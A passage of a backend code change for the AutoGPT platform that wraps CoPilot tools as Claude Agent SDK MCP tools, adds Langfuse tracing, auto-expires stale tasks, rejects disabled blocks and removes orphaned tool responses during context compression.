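For orientation, a minimal sketch of how the pieces above compose: the compressed history is rendered into a <conversation_history> prefix and prepended to the current user message before the SDK query is sent. The ChatMessage below is a simplified stand-in for the real backend model, and the messages are invented for illustration.

# Illustrative sketch only; assumes _format_conversation_context from above.
from dataclasses import dataclass

@dataclass
class ChatMessage:  # stand-in, not the real backend model
    role: str
    content: str | None = None

history = [
    ChatMessage(role="user", content="hello"),
    ChatMessage(role="assistant", content="Hi! How can I help?"),
]
prefix = _format_conversation_context(history)
current = "Build me a newsletter agent"
query_message = f"{prefix}\n\nNow, the user says:\n{current}" if prefix else current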
@@ -0,0 +1,321 @@
"""Tool adapter for wrapping existing CoPilot tools as Claude Agent SDK MCP tools.

This module provides the adapter layer that converts existing BaseTool implementations
into in-process MCP tools that can be used with the Claude Agent SDK.
"""

import json
import logging
import os
import uuid
from contextvars import ContextVar
from typing import Any

from backend.api.features.chat.model import ChatSession
from backend.api.features.chat.tools import TOOL_REGISTRY
from backend.api.features.chat.tools.base import BaseTool

logger = logging.getLogger(__name__)

# Allowed base directory for the Read tool (SDK saves oversized tool results here)
_SDK_TOOL_RESULTS_DIR = os.path.expanduser("~/.claude/")

# MCP server naming - the SDK prefixes tool names as "mcp__{server_name}__{tool}"
MCP_SERVER_NAME = "copilot"
MCP_TOOL_PREFIX = f"mcp__{MCP_SERVER_NAME}__"

# Context variables to pass user/session info to tool execution
_current_user_id: ContextVar[str | None] = ContextVar("current_user_id", default=None)
_current_session: ContextVar[ChatSession | None] = ContextVar(
    "current_session", default=None
)
_current_tool_call_id: ContextVar[str | None] = ContextVar(
    "current_tool_call_id", default=None
)

# Stash for MCP tool outputs before the SDK potentially truncates them.
# Keyed by tool_name → full output string. Consumed (popped) by the
# response adapter when it builds StreamToolOutputAvailable.
_pending_tool_outputs: ContextVar[dict[str, str]] = ContextVar(
    "pending_tool_outputs", default=None  # type: ignore[arg-type]
)


def set_execution_context(
    user_id: str | None,
    session: ChatSession,
    tool_call_id: str | None = None,
) -> None:
    """Set the execution context for tool calls.

    This must be called before streaming begins to ensure tools have access
    to user_id and session information.
    """
    _current_user_id.set(user_id)
    _current_session.set(session)
    _current_tool_call_id.set(tool_call_id)
    _pending_tool_outputs.set({})


def get_execution_context() -> tuple[str | None, ChatSession | None, str | None]:
    """Get the current execution context."""
    return (
        _current_user_id.get(),
        _current_session.get(),
        _current_tool_call_id.get(),
    )


def pop_pending_tool_output(tool_name: str) -> str | None:
    """Pop and return the stashed full output for *tool_name*.

    The SDK CLI may truncate large tool results (writing them to disk and
    replacing the content with a file reference). This stash keeps the
    original MCP output so the response adapter can forward it to the
    frontend for proper widget rendering.

    Returns ``None`` if nothing was stashed for *tool_name*.
    """
    pending = _pending_tool_outputs.get(None)
    if pending is None:
        return None
    return pending.pop(tool_name, None)


def create_tool_handler(base_tool: BaseTool):
    """Create an async handler function for a BaseTool.

    This wraps the existing BaseTool._execute method to be compatible
    with the Claude Agent SDK MCP tool format.
    """

    async def tool_handler(args: dict[str, Any]) -> dict[str, Any]:
        """Execute the wrapped tool and return MCP-formatted response."""
        user_id, session, tool_call_id = get_execution_context()

        if session is None:
            return {
                "content": [
                    {
                        "type": "text",
                        "text": json.dumps(
                            {
                                "error": "No session context available",
                                "type": "error",
                            }
                        ),
                    }
                ],
                "isError": True,
            }

        try:
            # Call the existing tool's execute method
            # Generate unique tool_call_id per invocation for proper correlation
            effective_id = tool_call_id or f"sdk-{uuid.uuid4().hex[:12]}"
            result = await base_tool.execute(
                user_id=user_id,
                session=session,
                tool_call_id=effective_id,
                **args,
            )

            # The result is a StreamToolOutputAvailable, extract the output
            text = (
                result.output
                if isinstance(result.output, str)
                else json.dumps(result.output)
            )

            # Stash the full output before the SDK potentially truncates it.
            # The response adapter will pop this for frontend widget rendering.
            pending = _pending_tool_outputs.get(None)
            if pending is not None:
                pending[base_tool.name] = text

            return {
                "content": [{"type": "text", "text": text}],
                "isError": not result.success,
            }

        except Exception as e:
            logger.error(f"Error executing tool {base_tool.name}: {e}", exc_info=True)
            return {
                "content": [
                    {
                        "type": "text",
                        "text": json.dumps(
                            {
                                "error": str(e),
                                "type": "error",
                                "message": f"Failed to execute {base_tool.name}",
                            }
                        ),
                    }
                ],
                "isError": True,
            }

    return tool_handler


def _build_input_schema(base_tool: BaseTool) -> dict[str, Any]:
    """Build a JSON Schema input schema for a tool."""
    return {
        "type": "object",
        "properties": base_tool.parameters.get("properties", {}),
        "required": base_tool.parameters.get("required", []),
    }


def get_tool_definitions() -> list[dict[str, Any]]:
    """Get all tool definitions in MCP format.

    Returns a list of tool definitions that can be used with
    create_sdk_mcp_server or as raw tool definitions.
    """
    tool_definitions = []

    for tool_name, base_tool in TOOL_REGISTRY.items():
        tool_def = {
            "name": tool_name,
            "description": base_tool.description,
            "inputSchema": _build_input_schema(base_tool),
        }
        tool_definitions.append(tool_def)

    return tool_definitions


def get_tool_handlers() -> dict[str, Any]:
    """Get all tool handlers mapped by name.

    Returns a dictionary mapping tool names to their handler functions.
    """
    handlers = {}

    for tool_name, base_tool in TOOL_REGISTRY.items():
        handlers[tool_name] = create_tool_handler(base_tool)

    return handlers


async def _read_file_handler(args: dict[str, Any]) -> dict[str, Any]:
    """Read a file with optional offset/limit. Restricted to SDK working directory.

    After reading, the file is deleted to prevent accumulation in long-running pods.
    """
    file_path = args.get("file_path", "")
    offset = args.get("offset", 0)
    limit = args.get("limit", 2000)

    # Security: only allow reads under the SDK's working directory
    real_path = os.path.realpath(file_path)
    if not real_path.startswith(_SDK_TOOL_RESULTS_DIR):
        return {
            "content": [{"type": "text", "text": f"Access denied: {file_path}"}],
            "isError": True,
        }

    try:
        with open(real_path) as f:
            lines = f.readlines()
        selected = lines[offset : offset + limit]
        content = "".join(selected)
        return {"content": [{"type": "text", "text": content}], "isError": False}
    except FileNotFoundError:
        return {
            "content": [{"type": "text", "text": f"File not found: {file_path}"}],
            "isError": True,
        }
    except Exception as e:
        return {
            "content": [{"type": "text", "text": f"Error reading file: {e}"}],
            "isError": True,
        }


_READ_TOOL_NAME = "Read"
_READ_TOOL_DESCRIPTION = (
    "Read a file from the local filesystem. "
    "Use offset and limit to read specific line ranges for large files."
)
_READ_TOOL_SCHEMA = {
    "type": "object",
    "properties": {
        "file_path": {
            "type": "string",
            "description": "The absolute path to the file to read",
        },
        "offset": {
            "type": "integer",
            "description": "Line number to start reading from (0-indexed). Default: 0",
        },
        "limit": {
            "type": "integer",
            "description": "Number of lines to read. Default: 2000",
        },
    },
    "required": ["file_path"],
}


# Create the MCP server configuration
def create_copilot_mcp_server():
    """Create an in-process MCP server configuration for CoPilot tools.

    This can be passed to ClaudeAgentOptions.mcp_servers.

    Note: The actual SDK MCP server creation depends on the claude-agent-sdk
    package being available. This function returns the configuration that
    can be used with the SDK.
    """
    try:
        from claude_agent_sdk import create_sdk_mcp_server, tool

        # Create decorated tool functions
        sdk_tools = []

        for tool_name, base_tool in TOOL_REGISTRY.items():
            handler = create_tool_handler(base_tool)
            decorated = tool(
                tool_name,
                base_tool.description,
                _build_input_schema(base_tool),
            )(handler)
            sdk_tools.append(decorated)

        # Add the Read tool so the SDK can read back oversized tool results
        read_tool = tool(
            _READ_TOOL_NAME,
            _READ_TOOL_DESCRIPTION,
            _READ_TOOL_SCHEMA,
        )(_read_file_handler)
        sdk_tools.append(read_tool)

        server = create_sdk_mcp_server(
            name=MCP_SERVER_NAME,
            version="1.0.0",
            tools=sdk_tools,
        )

        return server

    except ImportError:
        # Let ImportError propagate so service.py handles the fallback
        raise


# SDK built-in tools allowed within the workspace directory.
# Security hooks validate that file paths stay within sdk_cwd
# and that Bash commands are restricted to a safe allowlist.
_SDK_BUILTIN_TOOLS = ["Read", "Write", "Edit", "Glob", "Grep", "Bash"]

# List of tool names for allowed_tools configuration
# Include MCP tools, the MCP Read tool for oversized results,
# and SDK built-in file tools for workspace operations.
COPILOT_TOOL_NAMES = [
    *[f"{MCP_TOOL_PREFIX}{name}" for name in TOOL_REGISTRY.keys()],
    f"{MCP_TOOL_PREFIX}{_READ_TOOL_NAME}",
    *_SDK_BUILTIN_TOOLS,
]
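A rough usage sketch of this adapter layer, assuming the module above is imported: set the execution context, fetch a wrapped handler, and await it. The tool name "find_blocks" and the session argument are assumptions for illustration; any key registered in TOOL_REGISTRY works.

# Hypothetical usage; "find_blocks" is an assumed TOOL_REGISTRY key.
async def demo(session: ChatSession) -> None:
    set_execution_context(user_id="user-123", session=session)
    handler = get_tool_handlers()["find_blocks"]
    result = await handler({"query": "send email"})
    # MCP-shaped response: {"content": [{"type": "text", "text": ...}], "isError": bool}
    print(result["isError"], result["content"][0]["text"][:200])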
@@ -0,0 +1,426 @@
"""Langfuse tracing integration for Claude Agent SDK.

This module provides modular, non-invasive observability for SDK sessions.
All tracing is opt-in (only active when Langfuse credentials are configured)
and designed to not affect the core execution flow.

Usage:
    async with TracedSession(session_id, user_id) as tracer:
        # Your SDK code here
        tracer.log_user_message(message)
        async for sdk_msg in client.receive_messages():
            tracer.log_sdk_message(sdk_msg)
        tracer.log_result(result_message)
"""

from __future__ import annotations

import logging
import time
from contextlib import asynccontextmanager
from dataclasses import dataclass, field
from typing import TYPE_CHECKING, Any

from backend.util.settings import Settings

if TYPE_CHECKING:
    from claude_agent_sdk import Message, ResultMessage

logger = logging.getLogger(__name__)
settings = Settings()


def _is_langfuse_configured() -> bool:
    """Check if Langfuse credentials are configured."""
    return bool(
        settings.secrets.langfuse_public_key and settings.secrets.langfuse_secret_key
    )


@dataclass
class ToolSpan:
    """Tracks a single tool call for tracing."""

    tool_call_id: str
    tool_name: str
    input: dict[str, Any]
    start_time: float = field(default_factory=time.perf_counter)
    output: str | None = None
    success: bool = True
    end_time: float | None = None


@dataclass
class GenerationSpan:
    """Tracks an LLM generation (text output) for tracing."""

    text: str = ""
    start_time: float = field(default_factory=time.perf_counter)
    end_time: float | None = None
    tool_calls: list[ToolSpan] = field(default_factory=list)


class TracedSession:
    """Context manager for tracing a Claude Agent SDK session with Langfuse.

    Automatically creates a trace with:
    - Session-level metadata (user_id, session_id)
    - Generation spans for LLM outputs
    - Tool call spans with input/output
    - Token usage and cost (from ResultMessage)

    If Langfuse is not configured, all methods are no-ops.
    """

    def __init__(
        self,
        session_id: str,
        user_id: str | None = None,
        system_prompt: str | None = None,
    ):
        self.session_id = session_id
        self.user_id = user_id
        self.system_prompt = system_prompt
        self.enabled = _is_langfuse_configured()

        # Internal state
        self._trace: Any = None
        self._langfuse: Any = None
        self._user_message: str | None = None
        self._generations: list[GenerationSpan] = []
        self._current_generation: GenerationSpan | None = None
        self._pending_tools: dict[str, ToolSpan] = {}
        self._start_time: float = 0

    async def __aenter__(self) -> TracedSession:
        """Start the trace."""
        if not self.enabled:
            return self

        try:
            from langfuse import get_client

            self._langfuse = get_client()
            self._start_time = time.perf_counter()

            # Create the root trace
            self._trace = self._langfuse.trace(
                name="copilot-sdk-session",
                session_id=self.session_id,
                user_id=self.user_id,
                metadata={
                    "sdk": "claude-agent-sdk",
                    "has_system_prompt": bool(self.system_prompt),
                },
            )
            logger.debug(f"[Tracing] Started trace for session {self.session_id}")

        except Exception as e:
            logger.warning(f"[Tracing] Failed to start trace: {e}")
            self.enabled = False

        return self

    async def __aexit__(self, exc_type: Any, exc_val: Any, exc_tb: Any) -> None:
        """End the trace and flush to Langfuse."""
        if not self.enabled or not self._trace:
            return

        try:
            # Finalize any open generation
            self._finalize_current_generation()

            # Add generations as spans
            for gen in self._generations:
                self._trace.span(
                    name="llm-generation",
                    start_time=gen.start_time,
                    end_time=gen.end_time or time.perf_counter(),
                    output=gen.text[:1000] if gen.text else None,  # Truncate
                    metadata={"tool_calls": len(gen.tool_calls)},
                )

                # Add tool calls as nested spans
                for tool in gen.tool_calls:
                    self._trace.span(
                        name=f"tool:{tool.tool_name}",
                        start_time=tool.start_time,
                        end_time=tool.end_time or time.perf_counter(),
                        input=tool.input,
                        output=tool.output[:500] if tool.output else None,
                        metadata={
                            "tool_call_id": tool.tool_call_id,
                            "success": tool.success,
                        },
                    )

            # Update trace with final status
            status = "error" if exc_type else "success"
            self._trace.update(
                output=self._generations[-1].text[:500] if self._generations else None,
                metadata={"status": status, "num_generations": len(self._generations)},
            )

            # Flush asynchronously (Langfuse handles this in background)
            logger.debug(
                f"[Tracing] Completed trace for session {self.session_id}, "
                f"{len(self._generations)} generations"
            )

        except Exception as e:
            logger.warning(f"[Tracing] Failed to finalize trace: {e}")

    def log_user_message(self, message: str) -> None:
        """Log the user's input message."""
        if not self.enabled or not self._trace:
            return

        self._user_message = message
        try:
            self._trace.update(input=message[:1000])
        except Exception as e:
            logger.debug(f"[Tracing] Failed to log user message: {e}")

    def log_sdk_message(self, sdk_message: Message) -> None:
        """Log an SDK message (automatically categorizes by type)."""
        if not self.enabled:
            return

        try:
            from claude_agent_sdk import (
                AssistantMessage,
                ResultMessage,
                TextBlock,
                ToolResultBlock,
                ToolUseBlock,
                UserMessage,
            )

            if isinstance(sdk_message, AssistantMessage):
                # Start a new generation if needed
                if self._current_generation is None:
                    self._current_generation = GenerationSpan()
                    self._generations.append(self._current_generation)

                for block in sdk_message.content:
                    if isinstance(block, TextBlock) and block.text:
                        self._current_generation.text += block.text

                    elif isinstance(block, ToolUseBlock):
                        tool_span = ToolSpan(
                            tool_call_id=block.id,
                            tool_name=block.name,
                            input=block.input or {},
                        )
                        self._pending_tools[block.id] = tool_span
                        if self._current_generation:
                            self._current_generation.tool_calls.append(tool_span)

            elif isinstance(sdk_message, UserMessage):
                # UserMessage carries tool results
                content = sdk_message.content
                blocks = content if isinstance(content, list) else []
                for block in blocks:
                    if isinstance(block, ToolResultBlock) and block.tool_use_id:
                        tool_span = self._pending_tools.get(block.tool_use_id)
                        if tool_span:
                            tool_span.end_time = time.perf_counter()
                            tool_span.success = not (block.is_error or False)
                            tool_span.output = self._extract_tool_output(block.content)

                # After tool results, finalize current generation
                # (SDK will start a new AssistantMessage for continuation)
                self._finalize_current_generation()

            elif isinstance(sdk_message, ResultMessage):
                self._log_result(sdk_message)

        except Exception as e:
            logger.debug(f"[Tracing] Failed to log SDK message: {e}")

    def _log_result(self, result: ResultMessage) -> None:
        """Log the final result with usage and cost."""
        if not self.enabled or not self._trace:
            return

        try:
            # Extract usage info
            usage = result.usage or {}
            metadata: dict[str, Any] = {
                "duration_ms": result.duration_ms,
                "duration_api_ms": result.duration_api_ms,
                "num_turns": result.num_turns,
                "is_error": result.is_error,
            }

            if result.total_cost_usd is not None:
                metadata["cost_usd"] = result.total_cost_usd

            if usage:
                metadata["usage"] = usage

            self._trace.update(metadata=metadata)

            # Log as a generation for proper Langfuse cost/usage tracking
            if usage or result.total_cost_usd:
                self._trace.generation(
                    name="claude-sdk-completion",
                    model="claude-sonnet-4-20250514",  # SDK default model
                    usage=(
                        {
                            "input": usage.get("input_tokens", 0),
                            "output": usage.get("output_tokens", 0),
                            "total": usage.get("input_tokens", 0)
                            + usage.get("output_tokens", 0),
                        }
                        if usage
                        else None
                    ),
                    metadata={"cost_usd": result.total_cost_usd},
                )

            logger.debug(
                f"[Tracing] Logged result: {result.num_turns} turns, "
                f"${result.total_cost_usd:.4f} cost"
                if result.total_cost_usd
                else f"[Tracing] Logged result: {result.num_turns} turns"
            )

        except Exception as e:
            logger.debug(f"[Tracing] Failed to log result: {e}")

    def _finalize_current_generation(self) -> None:
        """Mark the current generation as complete."""
        if self._current_generation:
            self._current_generation.end_time = time.perf_counter()
            self._current_generation = None

    @staticmethod
    def _extract_tool_output(content: str | list[dict[str, str]] | None) -> str:
        """Extract string output from tool result content."""
        if isinstance(content, str):
            return content
        if isinstance(content, list):
            parts = [
                item.get("text", "") for item in content if item.get("type") == "text"
            ]
            return "".join(parts) if parts else str(content)
        return str(content) if content else ""


@asynccontextmanager
async def traced_session(
    session_id: str,
    user_id: str | None = None,
    system_prompt: str | None = None,
):
    """Convenience async context manager for tracing SDK sessions.

    Usage:
        async with traced_session(session_id, user_id) as tracer:
            tracer.log_user_message(message)
            async for msg in client.receive_messages():
                tracer.log_sdk_message(msg)
    """
    tracer = TracedSession(session_id, user_id, system_prompt)
    async with tracer:
        yield tracer


def create_tracing_hooks(tracer: TracedSession) -> dict[str, Any]:
    """Create SDK hooks for fine-grained Langfuse tracing.

    These hooks capture precise timing for tool executions and failures
    that may not be visible in the message stream.

    Designed to be merged with security hooks:
        hooks = {**security_hooks, **create_tracing_hooks(tracer)}

    Args:
        tracer: The active TracedSession instance

    Returns:
        Hooks configuration dict for ClaudeAgentOptions
    """
    if not tracer.enabled:
        return {}

    try:
        from claude_agent_sdk import HookMatcher
        from claude_agent_sdk.types import HookContext, HookInput, SyncHookJSONOutput

        async def trace_pre_tool_use(
            input_data: HookInput,
            tool_use_id: str | None,
            context: HookContext,
        ) -> SyncHookJSONOutput:
            """Record tool start time for accurate duration tracking."""
            _ = context
            if not tool_use_id:
                return {}
            tool_name = str(input_data.get("tool_name", "unknown"))
            tool_input = input_data.get("tool_input", {})

            # Record start time in pending tools
            tracer._pending_tools[tool_use_id] = ToolSpan(
                tool_call_id=tool_use_id,
                tool_name=tool_name,
                input=tool_input if isinstance(tool_input, dict) else {},
            )
            return {}

        async def trace_post_tool_use(
            input_data: HookInput,
            tool_use_id: str | None,
            context: HookContext,
        ) -> SyncHookJSONOutput:
            """Record tool completion for duration calculation."""
            _ = context
            if tool_use_id and tool_use_id in tracer._pending_tools:
                tracer._pending_tools[tool_use_id].end_time = time.perf_counter()
                tracer._pending_tools[tool_use_id].success = True
            return {}

        async def trace_post_tool_failure(
            input_data: HookInput,
            tool_use_id: str | None,
            context: HookContext,
        ) -> SyncHookJSONOutput:
            """Record tool failures for error tracking."""
            _ = context
            if tool_use_id and tool_use_id in tracer._pending_tools:
                tracer._pending_tools[tool_use_id].end_time = time.perf_counter()
                tracer._pending_tools[tool_use_id].success = False
                error = input_data.get("error", "Unknown error")
                tracer._pending_tools[tool_use_id].output = f"ERROR: {error}"
            return {}

        return {
            "PreToolUse": [HookMatcher(matcher="*", hooks=[trace_pre_tool_use])],
            "PostToolUse": [HookMatcher(matcher="*", hooks=[trace_post_tool_use])],
            "PostToolUseFailure": [
                HookMatcher(matcher="*", hooks=[trace_post_tool_failure])
            ],
        }

    except ImportError:
        logger.debug("[Tracing] SDK not available for hook-based tracing")
        return {}


def merge_hooks(*hook_dicts: dict[str, Any]) -> dict[str, Any]:
    """Merge multiple hook configurations into one.

    Combines hook matchers for the same event type, allowing both
    security and tracing hooks to coexist.

    Usage:
        combined = merge_hooks(security_hooks, tracing_hooks)
    """
    result: dict[str, list[Any]] = {}
    for hook_dict in hook_dicts:
        for event_name, matchers in hook_dict.items():
            if event_name not in result:
                result[event_name] = []
            result[event_name].extend(matchers)
    return result
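One detail worth spelling out: merge_hooks concatenates the matcher lists per event instead of overwriting them, so security and tracing hooks both fire for shared events; a plain dict union such as {**security_hooks, **tracing_hooks} would keep only one side's matchers for any event key both dicts define. A toy illustration, with strings standing in for HookMatcher objects:

# Toy values stand in for HookMatcher entries.
security_hooks = {"PreToolUse": ["validate_path"], "PostToolUse": ["audit"]}
tracing_hooks = {"PreToolUse": ["start_span"], "PostToolUseFailure": ["mark_failed"]}

combined = merge_hooks(security_hooks, tracing_hooks)
assert combined == {
    "PreToolUse": ["validate_path", "start_span"],  # both kept, in order
    "PostToolUse": ["audit"],
    "PostToolUseFailure": ["mark_failed"],
}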
@@ -245,12 +245,16 @@ async def _get_system_prompt_template(context: str) -> str:
     return DEFAULT_SYSTEM_PROMPT.format(users_information=context)
 
 
-async def _build_system_prompt(user_id: str | None) -> tuple[str, Any]:
+async def _build_system_prompt(
+    user_id: str | None, has_conversation_history: bool = False
+) -> tuple[str, Any]:
     """Build the full system prompt including business understanding if available.
 
     Args:
-        user_id: The user ID for fetching business understanding
-            If "default" and this is the user's first session, will use "onboarding" instead.
+        user_id: The user ID for fetching business understanding.
+        has_conversation_history: Whether there's existing conversation history.
+            If True, we don't tell the model to greet/introduce (since they're
+            already in a conversation).
 
     Returns:
         Tuple of (compiled prompt string, business understanding object)

@@ -266,6 +270,8 @@ async def _build_system_prompt(user_id: str | None) -> tuple[str, Any]:
 
     if understanding:
         context = format_understanding_for_prompt(understanding)
+    elif has_conversation_history:
+        context = "No prior understanding saved yet. Continue the existing conversation naturally."
     else:
         context = "This is the first time you are meeting the user. Greet them and introduce them to the platform"
 

@@ -374,7 +380,6 @@ async def stream_chat_completion(
 
     Raises:
         NotFoundError: If session_id is invalid
-        ValueError: If max_context_messages is exceeded
 
     """
     completion_start = time.monotonic()

@@ -459,8 +464,9 @@ async def stream_chat_completion(
 
     # Generate title for new sessions on first user message (non-blocking)
     # Check: is_user_message, no title yet, and this is the first user message
-    if is_user_message and message and not session.title:
-        user_messages = [m for m in session.messages if m.role == "user"]
+    user_messages = [m for m in session.messages if m.role == "user"]
+    first_user_msg = message or (user_messages[0].content if user_messages else None)
+    if is_user_message and first_user_msg and not session.title:
         if len(user_messages) == 1:
             # First user message - generate title in background
             import asyncio

@@ -468,7 +474,7 @@ async def stream_chat_completion(
             # Capture only the values we need (not the session object) to avoid
             # stale data issues when the main flow modifies the session
             captured_session_id = session_id
-            captured_message = message
+            captured_message = first_user_msg
             captured_user_id = user_id
 
             async def _update_title():

@@ -1233,7 +1239,7 @@ async def _stream_chat_chunks(
 
     total_time = (time_module.perf_counter() - stream_chunks_start) * 1000
     logger.info(
-        f"[TIMING] _stream_chat_chunks COMPLETED in {total_time/1000:.1f}s; "
+        f"[TIMING] _stream_chat_chunks COMPLETED in {total_time / 1000:.1f}s; "
         f"session={session.session_id}, user={session.user_id}",
         extra={"json_fields": {**log_meta, "total_time_ms": total_time}},
     )

@@ -814,6 +814,28 @@ async def get_active_task_for_session(
         if task_user_id and user_id != task_user_id:
             continue
 
+        # Auto-expire stale tasks that exceeded stream_timeout
+        created_at_str = meta.get("created_at", "")
+        if created_at_str:
+            try:
+                created_at = datetime.fromisoformat(created_at_str)
+                age_seconds = (
+                    datetime.now(timezone.utc) - created_at
+                ).total_seconds()
+                if age_seconds > config.stream_timeout:
+                    logger.warning(
+                        f"[TASK_LOOKUP] Auto-expiring stale task {task_id[:8]}... "
+                        f"(age={age_seconds:.0f}s > timeout={config.stream_timeout}s)"
+                    )
+                    await mark_task_completed(task_id, "failed")
+                    continue
+            except (ValueError, TypeError):
+                pass
+
+        logger.info(
+            f"[TASK_LOOKUP] Found running task {task_id[:8]}... for session {session_id[:8]}..."
+        )
+
         # Get the last message ID from Redis Stream
         stream_key = _get_task_stream_key(task_id)
         last_id = "0-0"

@@ -335,11 +335,17 @@ class BlockInfoSummary(BaseModel):
     name: str
     description: str
     categories: list[str]
-    input_schema: dict[str, Any]
-    output_schema: dict[str, Any]
+    input_schema: dict[str, Any] = Field(
+        default_factory=dict,
+        description="Full JSON schema for block inputs",
+    )
+    output_schema: dict[str, Any] = Field(
+        default_factory=dict,
+        description="Full JSON schema for block outputs",
+    )
     required_inputs: list[BlockInputFieldInfo] = Field(
         default_factory=list,
-        description="List of required input fields for this block",
+        description="List of input fields for this block",
     )

@@ -352,7 +358,7 @@ class BlockListResponse(ToolResponseBase):
     query: str
     usage_hint: str = Field(
         default="To execute a block, call run_block with block_id set to the block's "
-        "'id' field and input_data containing the required fields from input_schema."
+        "'id' field and input_data containing the fields listed in required_inputs."
     )

@@ -21,43 +21,71 @@ logger = logging.getLogger(__name__)
 
 class HumanInTheLoopBlock(Block):
     """
-    This block pauses execution and waits for human approval or modification of the data.
+    Pauses execution and waits for human approval or rejection of the data.
 
-    When executed, it creates a pending review entry and sets the node execution status
-    to REVIEW. The execution will remain paused until a human user either:
-    - Approves the data (with or without modifications)
-    - Rejects the data
+    When executed, this block creates a pending review entry and sets the node execution
+    status to REVIEW. The execution remains paused until a human user either approves
+    or rejects the data.
 
-    This is useful for workflows that require human validation or intervention before
-    proceeding to the next steps.
+    **How it works:**
+    - The input data is presented to a human reviewer
+    - The reviewer can approve or reject (and optionally modify the data if editable)
+    - On approval: the data flows out through the `approved_data` output pin
+    - On rejection: the data flows out through the `rejected_data` output pin
+
+    **Important:** The output pins yield the actual data itself, NOT status strings.
+    The approval/rejection decision determines WHICH output pin fires, not the value.
+    You do NOT need to compare the output to "APPROVED" or "REJECTED" - simply connect
+    downstream blocks to the appropriate output pin for each case.
+
+    **Example usage:**
+    - Connect `approved_data` → next step in your workflow (data was approved)
+    - Connect `rejected_data` → error handling or notification (data was rejected)
     """
 
     class Input(BlockSchemaInput):
-        data: Any = SchemaField(description="The data to be reviewed by a human user")
+        data: Any = SchemaField(
+            description="The data to be reviewed by a human user. "
+            "This exact data will be passed through to either approved_data or "
+            "rejected_data output based on the reviewer's decision."
+        )
         name: str = SchemaField(
-            description="A descriptive name for what this data represents",
+            description="A descriptive name for what this data represents. "
+            "This helps the reviewer understand what they are reviewing.",
        )
         editable: bool = SchemaField(
-            description="Whether the human reviewer can edit the data",
+            description="Whether the human reviewer can edit the data before "
+            "approving or rejecting it",
             default=True,
             advanced=True,
         )
 
     class Output(BlockSchemaOutput):
         approved_data: Any = SchemaField(
-            description="The data when approved (may be modified by reviewer)"
+            description="Outputs the input data when the reviewer APPROVES it. "
+            "The value is the actual data itself (not a status string like 'APPROVED'). "
+            "If the reviewer edited the data, this contains the modified version. "
+            "Connect downstream blocks here for the 'approved' workflow path."
         )
         rejected_data: Any = SchemaField(
-            description="The data when rejected (may be modified by reviewer)"
+            description="Outputs the input data when the reviewer REJECTS it. "
+            "The value is the actual data itself (not a status string like 'REJECTED'). "
+            "If the reviewer edited the data, this contains the modified version. "
+            "Connect downstream blocks here for the 'rejected' workflow path."
         )
         review_message: str = SchemaField(
-            description="Any message provided by the reviewer", default=""
+            description="Optional message provided by the reviewer explaining their "
+            "decision. Only outputs when the reviewer provides a message; "
+            "this pin does not fire if no message was given.",
+            default="",
        )
 
     def __init__(self):
         super().__init__(
             id="8b2a7b3c-6e9d-4a5f-8c1b-2e3f4a5b6c7d",
-            description="Pause execution and wait for human approval or modification of data",
+            description="Pause execution for human review. Data flows through "
+            "approved_data or rejected_data output based on the reviewer's decision. "
+            "Outputs contain the actual data, not status strings.",
             categories={BlockCategory.BASIC},
             input_schema=HumanInTheLoopBlock.Input,
             output_schema=HumanInTheLoopBlock.Output,

@@ -743,6 +743,11 @@ class GraphModel(Graph, GraphMeta):
                 # For invalid blocks, we still raise immediately as this is a structural issue
                 raise ValueError(f"Invalid block {node.block_id} for node #{node.id}")
 
+            if block.disabled:
+                raise ValueError(
+                    f"Block {node.block_id} is disabled and cannot be used in graphs"
+                )
+
             node_input_mask = (
                 nodes_input_masks.get(node.id, {}) if nodes_input_masks else {}
             )

@@ -213,6 +213,9 @@ async def execute_node(
         block_name=node_block.name,
     )
 
+    if node_block.disabled:
+        raise ValueError(f"Block {node_block.id} is disabled and cannot be executed")
+
     # Sanity check: validate the execution input.
     input_data, error = validate_exec(node, data.inputs, resolve_input=False)
     if input_data is None:

@@ -364,6 +364,44 @@ def _remove_orphan_tool_responses(
     return result
 
 
+def validate_and_remove_orphan_tool_responses(
+    messages: list[dict],
+    log_warning: bool = True,
+) -> list[dict]:
+    """
+    Validate tool_call/tool_response pairs and remove orphaned responses.
+
+    Scans messages in order, tracking all tool_call IDs. Any tool response
+    referencing an ID not seen in a preceding message is considered orphaned
+    and removed. This prevents API errors like Anthropic's "unexpected tool_use_id".
+
+    Args:
+        messages: List of messages to validate (OpenAI or Anthropic format)
+        log_warning: Whether to log a warning when orphans are found
+
+    Returns:
+        A new list with orphaned tool responses removed
+    """
+    available_ids: set[str] = set()
+    orphan_ids: set[str] = set()
+
+    for msg in messages:
+        available_ids |= _extract_tool_call_ids_from_message(msg)
+        for resp_id in _extract_tool_response_ids_from_message(msg):
+            if resp_id not in available_ids:
+                orphan_ids.add(resp_id)
+
+    if not orphan_ids:
+        return messages
+
+    if log_warning:
+        logger.warning(
+            f"Removing {len(orphan_ids)} orphan tool response(s): {orphan_ids}"
+        )
+
+    return _remove_orphan_tool_responses(messages, orphan_ids)
+
+
 def _ensure_tool_pairs_intact(
     recent_messages: list[dict],
     all_messages: list[dict],

@@ -723,6 +761,13 @@ async def compress_context(
 
     # Filter out any None values that may have been introduced
     final_msgs: list[dict] = [m for m in msgs if m is not None]
+
+    # ---- STEP 6: Final tool-pair validation ---------------------------------
+    # After all compression steps, verify that every tool response has a
+    # matching tool_call in a preceding assistant message. Remove orphans
+    # to prevent API errors (e.g., Anthropic's "unexpected tool_use_id").
+    final_msgs = validate_and_remove_orphan_tool_responses(final_msgs)
+
     final_count = sum(_msg_tokens(m, enc) for m in final_msgs)
     error = None
     if final_count + reserve > target_tokens:
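To make the orphan rule in the hunks above concrete, here is a small invented example in OpenAI message format: a tool response whose tool_call_id was never issued by a preceding assistant message is dropped, and everything else passes through unchanged.

# Invented messages for illustration only.
messages = [
    {
        "role": "assistant",
        "tool_calls": [
            {
                "id": "call_1",
                "type": "function",
                "function": {"name": "find_blocks", "arguments": "{}"},
            }
        ],
    },
    {"role": "tool", "tool_call_id": "call_1", "content": "ok"},     # kept
    {"role": "tool", "tool_call_id": "call_9", "content": "stale"},  # removed: orphan
]
cleaned = validate_and_remove_orphan_tool_responses(messages)
assert all(m.get("tool_call_id") != "call_9" for m in cleaned)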
autogpt_platform/backend/poetry.lock (generated, 850 lines changed): diff suppressed because it is too large.
@@ -11,15 +11,16 @@ packages = [{ include = "backend", format = "sdist" }]
 python = ">=3.10,<3.14"
 aio-pika = "^9.5.5"
 aiohttp = "^3.10.0"
-aiodns = "^4.0.0"
+aiodns = "^3.5.0"
 anthropic = "^0.79.0"
 apscheduler = "^3.11.1"
